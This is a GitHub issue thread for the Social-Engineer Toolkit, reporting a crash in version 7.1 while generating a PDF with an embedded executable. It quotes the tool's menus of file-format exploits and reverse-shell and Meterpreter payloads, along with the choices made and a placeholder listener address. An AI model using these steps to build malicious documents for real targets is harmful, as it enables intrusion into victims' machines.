trustedsec
commented
8 years ago Thank you for the bug report! this has been fixed and pushed out in version 7.1.1 :-)
Closed jarrodcoulter closed 8 years ago
trustedsec
commented
8 years ago Thank you for the bug report! this has been fixed and pushed out in version 7.1.1 :-)
Version 7.1 generating a pdf with embedded exe:
Select the file format exploit you want. The default is the PDF embedded EXE.
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow 9) Adobe Flash Player "newfunction" Invalid Pointer Use 10) Adobe Collab.collectEmailInfo Buffer Overflow 11) Adobe Collab.getIcon Buffer Overflow 12) Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>17
[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.
set:payloads>2
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>7 set> IP address for the payload listener (LHOST): IPADDRESS set:payloads> Port to connect back on [443]: [-] Defaulting to port 443...
[!] Something went wrong, printing the error: name 'outfile' is not defined